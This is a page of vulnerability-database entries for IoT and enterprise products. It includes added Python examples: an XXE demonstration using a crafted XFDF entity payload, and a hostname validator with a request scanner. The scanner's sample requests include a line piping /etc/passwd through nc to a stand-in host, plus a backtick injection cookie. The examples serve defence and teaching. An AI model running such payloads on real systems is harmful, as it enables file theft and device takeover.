VARIoT IoT vulnerabilities database


VAR-201904-0293 CVE-2019-2591 Oracle PeopleSoft Enterprise HRMS (Candidate Gateway) vulnerability CVSS V2: 5.8
CVSS V3: 6.1
Severity: MEDIUM
Vulnerability in the PeopleSoft Enterprise HRMS component of Oracle PeopleSoft Products (subcomponent: Candidate Gateway). The supported version that is affected is 9.2. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise HRMS. Successful attacks require human interaction from a person other than the attacker, and while the vulnerability is in PeopleSoft Enterprise HRMS, attacks may significantly impact additional products (scope change). Successful attacks can result in unauthorized update, insert or delete access to some PeopleSoft Enterprise HRMS accessible data as well as unauthorized read access to a subset of that data. CVSS 3.0 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). The vulnerability is exploited over HTTPS. The vector profile (unauthenticated, user interaction required, changed scope, low confidentiality and integrity impact) is the usual signature of web-content injection such as reflected cross-site scripting; Oracle's advisory does not name the flaw class.
VAR-201904-0560 CVE-2018-18489 TP-LINK WR840N firmware input validation vulnerability CVSS V2: 6.8
CVSS V3: 4.9
Severity: MEDIUM
The ping feature in the Diagnostic functionality on TP-LINK WR840N v2 devices running firmware 3.16.9 Build 150701 Rel.51516n allows remote attackers to cause a denial of service (HTTP service termination) by modifying the packet size to a value higher than the UI limit of 1472. The limit exists only in the web UI: a modified request that exceeds it is not rejected by the device, so this is an input validation vulnerability that can put the device's web service into a denial-of-service state. TP-Link WR840N is a wireless router made by TP-Link (China). The flaw is in the diagnostic function of the WR840N v2 running firmware 3.16.9 Build 150701 Rel.51516n.
VAR-201904-0357 CVE-2019-4055 IBM MQ input validation vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
IBM MQ 8.0.0.0 through 8.0.0.10, 9.0.0.0 through 9.0.0.5, and 9.1.0.0 through 9.1.1 is vulnerable to a denial of service attack within the TLS key renegotiation function. IBM X-Force ID: 156564. The vendor reports this as an input validation vulnerability, published under IBM X-Force ID 156564, that can put the queue manager into a denial-of-service (DoS) state; an attacker can exploit it to cause a denial-of-service condition. The following products and versions are affected: IBM MQ and MQ Appliance 8.0.0.0 through 8.0.0.10, 9.0.0.0 through 9.0.0.5, 9.1.0.0 through 9.1.0.1, and 9.1.0 through 9.1.1.
VAR-201904-1022 CVE-2019-10953 Programmable Logic Controllers resource exhaustion vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
ABB, Phoenix Contact, Schneider Electric, Siemens, WAGO - Programmable Logic Controllers, multiple versions. Researchers have found that some controllers are susceptible to a denial-of-service attack due to a flood of network packets. The affected PLCs contain a resource exhaustion vulnerability: a remote attacker can flood the controller's network interface to cause a denial-of-service condition and interrupt control operation. The underlying weakness in these PLC products is improper management of system resources (memory, disk space, files and similar) under load.
VAR-201904-1019 CVE-2019-10949 Delta Industrial Automation CNCSoft ScreenEditor DPB Parsing Out-Of-Bounds Read Information Disclosure Vulnerability CVSS V2: 4.3
CVSS V3: 3.3
Severity: LOW
Delta Industrial Automation CNCSoft, CNCSoft ScreenEditor Version 1.00.88 and prior. Multiple out-of-bounds read vulnerabilities may be exploited, allowing information disclosure due to a lack of user input validation for processing specially crafted project files. Delta CNCSoft ScreenEditor contains an out-of-bounds read vulnerability through which information may be obtained. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Delta Industrial Automation CNCSoft ScreenEditor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of DPB files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the Administrator. The listing for the same product also records multiple stack-based buffer-overflow vulnerabilities and multiple heap-based buffer-overflow vulnerabilities; an out-of-bounds read of this kind typically supplies the memory disclosure an attacker needs to exploit such overflows reliably.
VAR-201904-0202 CVE-2019-8454 Check Point Endpoint Security client authorization, permissions and access control vulnerability CVSS V2: 6.9
CVSS V3: 7.0
Severity: HIGH
A local attacker can create a hard link between a file to which the Check Point Endpoint Security client for Windows before E80.96 writes and another BAT file; then, by impersonating the WPAD server, the attacker can write BAT commands into that file that will later be run by the user or the system. This is an authorization, permissions and access control vulnerability: a privileged process follows a link it did not create and writes attacker-influenced content to a location the attacker chose. The Check Point Endpoint Security Client for Windows is therefore prone to local privilege escalation; local attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges, resulting in complete compromise of the affected computer. Versions prior to Check Point Endpoint Security Client E80.96 for Windows are vulnerable. Check Point Endpoint Security is a set of endpoint protection software from Check Point (Israel).
VAR-201904-1550 CVE-2019-0228 Apache PDFBox XML External Entity vulnerability CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF. Because the parser is left able to resolve external entities, a crafted XFDF form-data document can make the application read local files into the parsed output or, through entity expansion, exhaust resources. Attackers can exploit this issue to obtain potentially sensitive information or cause a denial-of-service condition, which may lead to further attacks. Apache PDFBox 2.0.14 is vulnerable.
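As an added example, and not PDFBox's own code (PDFBox is Java), the following Python reproduces the bug class with the standard library's xml.sax: the same crafted XFDF is fed once to a parser that may resolve external general entities, as a parser left at unsafe defaults would, and once to a hardened one that disables resolution and additionally refuses any XFDF carrying a DTD. The XFDF payload and the temporary "secret" file it points at are constructed for the demonstration.

```python
"""Added example (not PDFBox code): the XXE condition reported for PDFBox
2.0.14, reproduced with Python's xml.sax so that a parser free to resolve
external entities can be compared with a hardened one on the same XFDF."""
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed XFDF form-data document carrying an external-entity declaration.
# SECRET_PATH is substituted at run time with a temporary file standing in for
# a sensitive local file the attacker wants to read.
XFDF_TEMPLATE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xfdf [<!ENTITY xxe SYSTEM "SECRET_PATH">]>
<xfdf xmlns="http://ns.adobe.com/xfdf/">
  <fields>
    <field name="Name"><value>&xxe;</value></field>
    <field name="Ref"><value>A-1</value></field>
  </fields>
</xfdf>
"""


class FieldValues(ContentHandler):
    """Collects the text content of every <value> element."""

    def __init__(self):
        super().__init__()
        self.values = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "value":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "value" and self._buf is not None:
            self.values.append("".join(self._buf))
            self._buf = None


def parse_xfdf(data: bytes, resolve_external_entities: bool) -> list:
    """Return the field values of an XFDF document.

    resolve_external_entities=True leaves the parser free to fetch SYSTEM
    entities (the PDFBox 2.0.14 condition); False is the hardened setting.
    """
    handler = FieldValues()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(data))
    return handler.values


def parse_xfdf_hardened(data: bytes) -> list:
    """Defence in depth: XFDF never needs a DTD, so refuse documents that
    declare one before the parser sees them, and disable entity resolution
    anyway in case the guard is bypassed."""
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        raise ValueError("DTD or entity declarations are not allowed in XFDF input")
    return parse_xfdf(data, resolve_external_entities=False)


def demo() -> dict:
    """Run the same payload through the vulnerable and hardened configurations."""
    with tempfile.TemporaryDirectory() as tmp:
        secret_path = os.path.join(tmp, "secret.txt")
        with open(secret_path, "w", encoding="utf-8") as fh:
            fh.write("s3cret-token")
        payload = XFDF_TEMPLATE.replace(b"SECRET_PATH", secret_path.encode())
        leaked = parse_xfdf(payload, resolve_external_entities=True)
        contained = parse_xfdf(payload, resolve_external_entities=False)
        try:
            parse_xfdf_hardened(payload)
            rejected = False
        except ValueError:
            rejected = True
    return {"vulnerable": leaked, "hardened": contained, "rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

With resolution enabled the "Name" field comes back as the contents of the secret file; with it disabled the entity is silently dropped and the field is empty; the DOCTYPE guard rejects the document before parsing. In Java the equivalent hardening is to set the Xerces feature `http://apache.org/xml/features/disallow-doctype-decl` to true (and the external-general-entities and external-parameter-entities features to false) on the parser factory before any XFDF is parsed.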
VAR-201904-1629 No CVE Himalayan Xiaoya smart speaker unauthorized access vulnerability CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
The Himalayan Xiaoya smart speaker is a smart speaker product made by Himalayan. It has an unauthorized access vulnerability: by constructing a malicious DLNA protocol packet, an attacker can make the speaker play any arbitrary remote or local audio file without authorization.
VAR-201904-0391 CVE-2019-9161 Sangfor Sundray WLAN Controller command injection vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
WAC on the Sangfor Sundray WLAN Controller version 3.7.4.2 and earlier has a Remote Code Execution issue allowing remote attackers to achieve full access to the system, because shell metacharacters in the nginx_webconsole.php Cookie header can be used to read an etc/config/wac/wns_cfg_admin_detail.xml file containing the admin password. (The password for root is the WebUI admin password concatenated with a static string.) The Sundray WLAN Controller therefore contains a command injection vulnerability; an attacker can execute arbitrary commands, obtain and alter information, and disrupt service (DoS). Sundray (Shenzhen Xinrui Network Technology Co., Ltd.) is a wholly-owned subsidiary of Sangfor and a provider of enterprise wireless, IoT and switching solutions. Sundray WLAN Controller (Sundray WAC) is its wireless LAN controller software; Sundray WAC 3.0 through WAC 3.7.4.2 is affected. Note the chain: the unauthenticated command injection yields the admin password from the configuration file, and the fixed root-password derivation (CVE-2019-9160 below) turns that into root on the appliance.
VAR-201904-0390 CVE-2019-9160 Sangfor Sundray WLAN Controller hard-coded credentials vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
WAC on the Sangfor Sundray WLAN Controller version 3.7.4.2 and earlier has a backdoor account allowing a remote attacker to log in to the system via SSH (on TCP port 22345) and escalate to root (because the password for root is the WebUI admin password concatenated with a static string). The Sundray WLAN Controller thus uses hard-coded credentials; exploitation allows information to be obtained and altered and service to be disrupted (DoS). Sundray (Shenzhen Xinrui Network Technology Co., Ltd.) is a wholly-owned subsidiary of Sangfor and a provider of enterprise wireless, IoT and switching solutions. Sundray WAC has a weak-password (backdoor) vulnerability that an attacker can use to gain administrative rights on the system. Sundray WLAN Controller (Sundray WAC) is the company's wireless LAN controller software. The root cause is credential management rather than a parsing bug: a built-in account with a fixed password, and a root password derived from the WebUI admin password by a static rule. Deriving one secret from another by concatenating a constant is equivalent to storing the root password in plaintext beside the admin password, so anyone who learns the admin password (for example via CVE-2019-9161 above) also holds root.
VAR-201904-0315 CVE-2019-3916 Verizon Fios Quantum Gateway firmware information disclosure vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
Information disclosure vulnerability in Verizon Fios Quantum Gateway (G1100) firmware version 02.01.00.05 allows a remote, unauthenticated attacker to retrieve the value of the password salt by simply requesting an API URL in a web browser (e.g. /api). Verizon Fios Quantum Gateway (G1100) is a wireless router from Verizon. The flaw is a configuration error in the exposed API, which returns the salt to unauthenticated callers, and an attacker can use it to obtain sensitive information about the affected component. A salt is not meant to be secret, but handing it to anyone on the network removes the one obstacle to precomputing guesses against the router's salted administrator password, which is the credential the authenticated command injection below (CVE-2019-3914) requires.
VAR-201904-0313 CVE-2019-3914 Verizon Fios Quantum Gateway firmware command injection vulnerability CVSS V2: 9.0
CVSS V3: 7.2
Severity: HIGH
Remote command injection vulnerability in Verizon Fios Quantum Gateway (G1100) firmware version 02.01.00.05 allows a remote, authenticated attacker to execute arbitrary commands on the target device by adding an access control rule for a network object with a crafted hostname. The firmware builds an executable command from the externally supplied hostname without filtering shell special characters; an authenticated attacker can thereby execute arbitrary commands, obtain and alter information, and disrupt service (DoS). Verizon Fios Quantum Gateway (G1100) is a wireless router from Verizon. Note the scoring split: CVSS V2 gives 9.0 (single authentication, complete impact) while CVSS V3 gives 7.2 because high privileges are required.
VAR-201904-1055 CVE-2018-19300 Multiple D-Link products input validation vulnerability CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
On D-Link DAP-1530 (A1) before firmware version 1.06b01, DAP-1610 (A1) before firmware version 1.06b01, DWR-111 (A1) before firmware version 1.02v02, DWR-116 (A1) before firmware version 1.06b03, DWR-512 (B1) before firmware version 2.02b01, DWR-711 (A1) through firmware version 1.11, DWR-712 (B1) before firmware version 2.04b01, DWR-921 (A1) before firmware version 1.02b01, and DWR-921 (B1) before firmware version 2.03b01, there exists an EXCU_SHELL file in the web directory. By sending a GET request with specially crafted headers to the /EXCU_SHELL URI, an attacker could execute arbitrary shell commands in the root context on the affected device. Other devices might be affected as well. The products contain an input validation vulnerability, reachable without authentication over the network (CVSS V3 9.8), through which information can be obtained and altered and service disrupted (DoS). D-Link DAP-1530 and DAP-1610 are wireless range extenders and DWR-111 is a wireless router, all made by D-Link (Taiwan); several D-Link products, including the DAP-1530, are affected.
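The Sundray (CVE-2019-9161), Verizon G1100 (CVE-2019-3914) and D-Link EXCU_SHELL (CVE-2018-19300) entries above are the same bug class: attacker-controlled text reaching a shell. As an added example, not code from any of these vendors, the following Python shows both sides a practitioner wants: server-side allow-listing of a hostname before a command is built from it (the control the G1100 access-rule code lacked, equally applicable to a diagnostic ping target), and a request-inspection check that flags shell metacharacters in header values or a request for /EXCU_SHELL, the signals an IDS would key on for the Cookie and crafted-header vectors. The sample requests are constructed; the X-Cmd header name stands in for the undisclosed real header, and the payloads are illustrative rather than the published ones.

```python
"""Added example (not vendor code): hostname allow-listing before a command is
built, and a request-inspection check for the shell-metacharacter and
/EXCU_SHELL patterns described in the entries above. Sample requests are
constructed; the X-Cmd header name stands in for the undisclosed real one."""
import re

# Characters that change how /bin/sh reads a string; any one of them in a
# value that will be interpolated into a command line is an injection.
# Quotes are deliberately omitted to keep cookie false positives low; add
# them if the sink wraps its argument in quotes.
SHELL_METACHARS = set(";|&`$(){}<>\\\n\r")

# RFC 1123 hostname: dot-separated labels of 1-63 letters, digits or hyphens
# that neither start nor end with a hyphen; 253 characters overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}\.?")


def is_valid_hostname(value: str) -> bool:
    """Allow-list check: only syntactically valid hostnames (dotted IPv4
    literals also match) pass; everything else is rejected outright."""
    return len(value) <= 253 and HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(hostname: str, count: int = 4) -> list:
    """Hardened construction of a diagnostic command: validate first, then
    return an argv list for subprocess.run(argv) with shell=False, so even a
    value that slipped past validation is one argument, never shell text."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    if not 1 <= count <= 10:
        raise ValueError(f"rejected count: {count}")
    return ["ping", "-c", str(count), hostname]


def scan_request(raw_request: str) -> list:
    """Detection side: return (where, value) pairs for a raw HTTP request that
    (a) targets /EXCU_SHELL or (b) carries shell metacharacters in a header.
    Cookie headers are checked per name=value pair because ';' and '=' are
    legitimate separators there."""
    findings = []
    request_line, *header_lines = raw_request.split("\r\n")
    parts = request_line.split(" ")
    if len(parts) >= 2 and parts[1].split("?", 1)[0] == "/EXCU_SHELL":
        findings.append(("path", parts[1]))
    for line in header_lines:
        if not line or ":" not in line:
            continue
        name, value = (s.strip() for s in line.split(":", 1))
        if name.lower() == "cookie":
            candidates = [pair.split("=", 1)[-1] for pair in value.split(";")]
        else:
            candidates = [value]
        if any(SHELL_METACHARS & set(c) for c in candidates):
            findings.append((name, value))
    return findings


# Constructed traffic, not captures from the affected devices.
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1\r\nHost: 192.0.2.1\r\nCookie: session=abc123; lang=en\r\n\r\n",
    "GET /nginx_webconsole.php HTTP/1.1\r\nHost: 192.0.2.1\r\nCookie: session=`id`\r\n\r\n",
    "GET /EXCU_SHELL HTTP/1.1\r\nHost: 192.0.2.2\r\nX-Cmd: cat /etc/passwd | nc 198.51.100.5 4444\r\n\r\n",
]


def scan_all(requests=SAMPLE_REQUESTS) -> list:
    """Findings per request, in order."""
    return [scan_request(r) for r in requests]


if __name__ == "__main__":
    print(build_ping_argv("printer.lan"))
    for hit in scan_all():
        print(hit)
```

The allow-list is the real fix: a hostname that matches RFC 1123 cannot carry a metacharacter, and passing argv without a shell means nothing downstream re-parses it. The metacharacter scan is a detection heuristic only; it catches the obvious payloads in the three reports but will miss encodings the target decodes before reaching the shell.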
VAR-201912-0570 CVE-2019-8632 Texture information disclosure vulnerability (analytics sent over HTTP) CVSS V2: 4.0
CVSS V3: 6.5
Severity: MEDIUM
Some analytics data was sent using HTTP rather than HTTPS. This was addressed by no longer sending this analytics data. This issue is fixed in Texture 5.11.10 for iOS and Texture 4.22.0.4 for Android. An attacker in a privileged network position may be able to intercept analytics data. Apple Texture is prone to an information-disclosure vulnerability; attackers can exploit this issue to obtain sensitive information that may aid in further attacks. Texture is a digital magazine app. The issue is cleartext transmission of data, not memory corruption.

Texture Canada Android & iOS Applications - Unencrypted Third Party Analytics (CVE-2019-8632)
https://www.info-sec.ca/advisories/Texture.html

Overview
"Texture: Unlimited access to over 100 of the world's best magazines on your computer, smartphone or tablet." (https://play.google.com/store/apps/details?id=com.nim.rogers) (https://itunes.apple.com/ca/app/texture-canada/id649174756)

Issue
The Texture Canada Android & iOS applications (Android version 4.21.0.1, iOS version 5.11.6 and below) send potentially sensitive information such as number of app launches, device model, Android or iOS version and screen resolution, unencrypted to a third party site (ScorecardResearch).

Impact
An attacker who can monitor network traffic could capture potentially sensitive information about the user's device without their knowledge.

Timeline
July 10, 2018 - Attempted to notify Texture of the issue via security@texture.ca
July 10, 2018 - Attempted to notify Texture of the issue via support@texture.ca
July 12, 2018 - Provided the details of the issue to Apple via product-security@apple.com
May 9, 2019 - Published an advisory to document the issue

Solution
Upgrade to Android version 4.22.0.4 or iOS version 5.11.10 (U.S. versions are also affected but have not been tested).
https://support.apple.com/en-us/HT210110
https://support.apple.com/en-us/HT210111
https://support.apple.com/en-us/HT201222

CVE-ID: CVE-2019-8632
VAR-201904-1559 CVE-2019-7476 SonicWall Global Management System key management vulnerability CVSS V2: 6.8
CVSS V3: 8.1
Severity: HIGH
A vulnerability in SonicWall Global Management System (GMS) allows a remote user to gain access to the appliance using an existing SSH key. This vulnerability affects GMS versions 9.1, 9.0, 8.7, 8.6, 8.4, 8.3 and earlier. SonicWall GMS is SonicWall's (United States) centralized management system for rapid deployment and management of SonicWall firewall, anti-spam, backup and recovery, and secure remote access solutions. A pre-existing SSH key is effectively a hard-coded credential: anyone who obtains the key can authenticate to the appliance without any other credential. The following versions are affected: SonicWall Global Management System 9.1, 9.0, 8.7, 8.6, 8.4 and 8.3.
VAR-201904-0760 CVE-2019-0162 Intel microprocessors information disclosure vulnerability CVSS V2: 2.1
CVSS V3: 3.8
Severity: LOW
Memory access in virtual memory mapping for some microprocessors may allow an authenticated user to potentially enable information disclosure via local access. Intel has released updates for each affected product. The expected impact depends on the individual vulnerability in the same Intel release: privilege escalation (CVE-2018-18094, CVE-2019-0158, CVE-2019-0162, CVE-2019-0163), information leak (CVE-2019-0162) and denial of service (CVE-2019-0162). Intel Microprocessors are CPU products of Intel Corporation (United States). A local attacker could exploit this vulnerability to disclose information.
VAR-201904-0099 CVE-2019-6610 BIG-IP input validation vulnerability CVSS V2: 9.0
CVSS V3: 8.6
Severity: HIGH
On BIG-IP versions 14.0.0-14.0.0.4, 13.0.0-13.1.1.1, 12.1.0-12.1.4, 11.6.0-11.6.3.4, and 11.5.1-11.5.8, the system is vulnerable to a denial of service attack when performing URL classification. F5 BIG-IP APM is F5's (United States) access and security solution, providing unified access to business-critical applications and networks. The flaw is an input validation error: the URL classification code fails to validate its input correctly, and an attacker can trigger a denial-of-service condition. Affected versions: F5 BIG-IP APM 14.0.0 through 14.0.0.4, 13.0.0 through 13.1.1.1, 12.1.0 through 12.1.4, 11.6.0 through 11.6.3.4, and 11.5.1 through 11.5.8.
VAR-201904-1501 CVE-2019-0041 Juniper Networks EX4300-MP Junos OS security feature vulnerability CVSS V2: 5.0
CVSS V3: 8.6
Severity: HIGH
On EX4300-MP Series devices with any lo0 filters applied, transit network traffic may reach the control plane via the loopback interface (lo0). The device may fail to forward such traffic. This issue affects Juniper Networks Junos OS 18.2 versions prior to 18.2R1-S2, and 18.2R2, on EX4300-MP Series. This issue does not affect any other EX series devices. Junos OS is the network operating system for Juniper's hardware devices. The lo0 filter is the control-plane protection mechanism on Junos, so when transit traffic bypasses it the authentication, access-control and rate-limiting policies it is supposed to enforce are lost; an attacker can send transit traffic that reaches the control plane and cause a denial-of-service condition for legitimate users.
VAR-201904-1005 CVE-2019-11017 D-Link DI-524 Cross-Site Scripting Vulnerability

Related entries in the VARIoT exploits database: VAR-E-201904-0091
CVSS V2: 3.5
CVSS V3: 4.8
Severity: MEDIUM
On D-Link DI-524 V2.06RU devices, multiple Stored and Reflected XSS vulnerabilities were found in the Web Configuration: /spap.htm, /smap.htm, and /cgi-bin/smap, as demonstrated by the cgi-bin/smap RC parameter. The D-Link DI-524, a wireless router from D-Link (Taiwan), thus contains a cross-site scripting vulnerability through which information may be obtained and altered. The flaw in the 2.06RU release stems from the web application's failure to validate or encode client-supplied data before reflecting or storing it, allowing an attacker to execute script in the browser of an administrator who follows a crafted link or views an affected page.
VAR-201904-0098 CVE-2019-6609 Multiple BIG-IP products certificate and password management vulnerability CVSS V2: 5.0
CVSS V3: 9.8
Severity: CRITICAL
Platform dependent weakness. This issue only impacts iSeries platforms. On these platforms, in BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) versions 14.0.0-14.1.0.1, 13.0.0-13.1.1.3, and 12.1.1 HF2-12.1.4, the secureKeyCapable attribute was not set, which causes Secure Vault not to use the F5 hardware support to store the unit key. Instead the unit key is stored in plaintext on disk, as would be the case for Z100 systems. Additionally this causes the unit key to be stored in UCS files taken on these platforms. Multiple BIG-IP products are therefore prone to an information-disclosure vulnerability: anyone who obtains the disk contents or a UCS archive from an affected iSeries unit also obtains the unit key on which Secure Vault's protection of the other stored secrets depends, which may lead to further attacks. F5 BIG-IP is F5's (United States) application delivery platform integrating traffic management, application security, load balancing and related functions. The weakness is one of trust and key management: a secret that should be hardware-bound is kept in plaintext, comparable to a hard-coded password or certificate. Affected versions: F5 BIG-IP 14.0.0 through 14.1.0.1, 13.0.0 through 13.1.1.3, and 12.1.1 HF2 through 12.1.4.